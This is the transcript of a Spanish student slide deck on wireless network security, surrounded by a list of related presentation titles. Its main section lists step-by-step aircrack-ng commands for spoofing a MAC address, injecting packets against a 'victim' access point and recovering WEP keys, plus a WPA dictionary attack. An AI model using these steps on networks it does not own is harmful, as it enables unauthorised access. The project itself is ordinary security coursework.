Proyecto De Seguridad En Redes Inalámbricas Realizado por: Rubén Nogales Sánchez Sergio Medrano Castro.

Slides:



Advertisements
Presentaciones similares
Protocolos TCP/IP.
Advertisements

PROTOCOLOS AUTOR: FERNANDO LIMA. PROTOCOLOS DE RED.
Charla básica penetración y protección Redes Inalámbricas
Protocolos de seguridad en redes inalámbricas Universidad Carlos III de Madrid Protocolos de Comunicaciones para Sistemas Móviles Saulo Barajas 7jun04.
Recuperación de la clave WiFi con cifrado WEP
INSTALACIÓN Y CONFIGURACIONES BÁSICAS DE LINUX Integrantes: Sergio Becerra Diego Mellado Jorge Rozas.
La Familia de Protocolos TCP/IP
Como Instalar Un Access Point
Lissette Oteiza María Angélica Seguel Saul Gajardo
DIDACTIFICACION DE IPv INSTALACIÓN Y CONFIGURACIÓN BÁSICA DE IPv6.
 Si usted nota que alguien está utilizando su ordenador o el de su empresa para dar algún tipo de servicio en Internet porque los programas van más despacio.
Como ocurre habitualmente, lo primero para configurar el punto de acceso es averiguar en los manuales la dirección IP inicial de gestión que le ha asignado.
Redes de área local Unidad 2 O PERACIONES A UXILIARES CON T ECNOLOGÍAS DE LA I NFORMACIÓN Y LA C OMUNICACIÓN.
Antecedentes:  Actualmente no existen mecanismos ni métodos eficaces que permitan determinar la seguridad de la red de datos cableada e inalámbrica,
TCP/IP Introducción TCP/IP Introducción. TCP/IP vs OSI Aplicación Presentación Sesión Transporte Red Enlace Física Aplicación Acceso a la red Física TCP/IP.
Taller: Ing. Luis Alberto Ortiz Configuración de Redes Wi-Fi Nivel Inicial.
LA FAMILIA DE PROTOCOLOS TCP/IP
Inseguridad en redes Wireless Antonio Bernier Moreno Victor M. Vega García Diego Martínez Lomas.
HERRAMIENTAS DE SEGURIDAD
SEGURIDAD EN LA RED CORPORATIVA:. SEGURIDAD EN LAS COMUNICACIONES INALÁMBRICAS.
Informática: Redes informáticas

Lo primero que tenemos que hacer es abrir la ventana de ejecutar ya sea con win + control. COMANDOS EN MCDOS Ya que nos aparezca la ventana, escribimos.
Router 3G Vodafone B970.
Ud.1 Servicios DHCP Índice del libro Índice del libro.
1. 2 ALMACENAMIENTO EN LA NUBE ARCHIVOS: -- DEL ORDENADOR -- DE LA TABLET -- DEL TELÉFONO MÓVIL -- DE CÁMARAS DIGITALES -- ETC.
REDES INALAMBRICAS NOMBRE: JOHN SANCHEZ NIVEL: SEXTO “D” PROF.: Ing. ELVA LARA 1.
GNU/Linux: Mantenimiento y Administración. 2 ● Archivos de Configuración de Usuario – Son aquellos que nos permiten tener una configuración para cada.
Configuración de puntos de acceso Puntos de Acceso Desarrollado por: IT +46, Basado en el trabajo original de: Onno W. Purbo and Sebastian Buettrich Traducido.
Configuración de clientes Clientes Inalámbricos Desarrollado por: Tomas B. Krag, Bruno Roger Editado por: Alberto Escudero Pascual IT + 46 Traducido por.
Auditoria Wireless Cracking WEP & WPA keys Jorge Luis Hernandez C. Linux/Aircrack.
Redes en gnuLinex Configuración de dispositivos Antonio Durán.
AppServ Implantación de Aplicaciones Web. Conceptos previos LAMP = Linux (SO) + Apache (Servidor Web) + MySQL (BBDD) + PHP (Web dinámicas). WAMP = Windows.
Configuración de Redes (UBUNTU). Estatica ● Direccion IP ● Mascara de Subred ● Puerta de Enlace ● DNS Dinámica ● DHCP Elementos necesarios.
RESUMEN M1-UF1 UF0852: Instal∙lació i actualització de sistemes operatius.
¡LOS SERVIDORES DE FTP Y NUBE!
Seguridad Inalámbrica ➲ Jordi Badenes 2 SMX. Indice Packet sniffing Pag 3 Nessus Pag 4 Knoppix Pag 5 Aircrack Pag 6 wpa tester Pag 7 xirrus wi-fi inspector.
© 2006 Cisco Systems, Inc. Todos los derechos reservados.Información pública de Cisco 1 Configuración de un router inalámbrico Conmutación y conexión inalámbrica.
G DATA V14 Client Instalación
OUTLOOK 2007.
Configuración de un switch
UF0854: Instalación y configuración de los nodos de una red local.
Fecha: 28/12/ 2015 Tema: Leyenda y créditos Objetivo: Identificar los elementos que intervienen en la elaboración de videos agregando textos a las imágenes.
Capítulo 8, Sección 8.6: IPsec
6. SEGURIDAD WI-FI 21/02/2018.
Configuración del cliente DHCP.
Capítulo 8, Sección 8.6: IPsec
Red pan ( Personal Área Networks)
INSTALACIÓN DE TU TIENDA ON LINE PRESTASHOP EN HOSTING
Disponibilidad y herramientas de uso:
Escritorio de Windows Sergio Escandón Omar Hurtado.
HERRAMIENTAS TAREAS DOC. WALTER ORLANDO RODRIGUEZ FISIOTERAPEUTA
Johnny Vanderley Montoya Mesa
Comandos de red y seguridad
Primeros pasos en internet
Instalación de Ubuntu, disco raid y algunos comandos Linux
Archivo.
Configuracion de un SAI Riello UPS
¿Cómo ejecutar un traceroute en Windows, Linux o en OSX?
Información Básica.
Información Básica.
Redes. Informe de los videos.
DIRECTIVAS DE SEGURIDAD. QUE SON La Configuración de las directivas de seguridad son reglas que los administradores pueden configurar en un equipo o en.
CONFIG URACIÓN DE UN ROUTER. DEFINICIÓN: Un router también conocido como enrutador, es un dispositivo que proporciona conectividad a nivel de red. Su.
CCNA 3 Conmutación y conexión inalámbrica de LAN
Tema 2 – Servicio DHCP Punto 8 – BOOTP Juan Luis Cano.
DEFINICION DE TOPOLOGIAS DE RED La topología de red se define como la cadena de comunicación usada por los nodos que conforman una red para comunicarse.
TUTORIAL PARA CREAR UNA PHPWEBQUEST.
Curso Redes (IS20) -Capítulo 5 1 Redes (IS20) Ingeniería Técnica en Informática de Sistemas Práctica 3- Estudio de tráfico sobre LAN
PUERTA FUERA DE SERVICIO NO ABRIR.
Transcripción de la presentación:

Proyecto De Seguridad En Redes Inalámbricas Realizado por: Rubén Nogales Sánchez Sergio Medrano Castro.

INTRODUCCIÓN:

Encriptación WPA:

1.- OBJETIVOS:

2.- PASOS QUE HEMOS SEGUIDO:

Puerta de enlace

2.- PASOS QUE HEMOS SEGUIDO:

FOTO

2.- PASOS QUE HEMOS SEGUIDO:

Cambiar de HTTP a HTTPS porque es más seguro.

2.- PASOS QUE HEMOS SEGUIDO:

FOTO

2.- PASOS QUE HEMOS SEGUIDO:

Comandos para WEP: ifconfig : sirve para ver la configuración analámbrica. Iwconfig : sirve para ver la configuración inalámbrica ifconfig wlan0 up : wlan0 es nuestra interface de nuestra red inalámbrica y up es para levantarla. airmon-ng start wlan0 : sirve para poner nuestra tarjeta en modo monitor (ahora nuestra interface se llama mon0) iwconfig : vemos nuestra nueva configuración inalámbrica ifconfig mon0 down : apaga nuestra interface macchanger -m 00:11:22:33:44:55 mon0 : cambiar nuestra mac y -m es para poner nuestra nueva mac inventada ifconfig mon0 up : volvemos a encender nuestra inteface airodump-ng mon0 : es el comando para empezar a escanear redes para luego crackearla (para pararlo pulsa control-c, es mejor abrir otra terminal)

2.- PASOS QUE HEMOS SEGUIDO: airodump-ng mon0 -w (nombre del fichero) -c (canal) : empieza a escanear y guarda los Ivs en el fichero. aireplay-ng -1 (canal del AP) -e (nombre del fichero) -a (mac de victima) -h (mac cambiada con macchanger) mon0 : envia ACK aireplay-ng -3 -b (mac victima) -h (tu mac) mon0 : empieza a enviar paquetes y ARP (nos interesan los ARP y ACKs y coger muchos vectores) aircrack-ng (nombre del fichero)*.cap : abre el fichero creado con los Ivs(vectores) y vemos si podemos o no conseguir la clave WEP con los vectores disponibles (normalmente desde hasta o mas)

FOTO

Otro tipo de encriptación (WPA) ifconfig iwconfig ifconfig wlan0 up airmon-ng start wlan0 iwconfig airodump-ng -c 6 --bssid (mac victima) -w (Nombre de tu fichero) mon0 aireplay-ng a (mac victima) -c (tu mac) mon0 aircrack-ng -w dictionary_spanish.dic -0 (tu fichero)*.cap Esto no hemos llegado a hacerlo Antes de poner el diccionario te lo bajas de Internet y luego lo guardas en la carpeta HOME

FOTO

3.- MATERIALES NECESARIOS: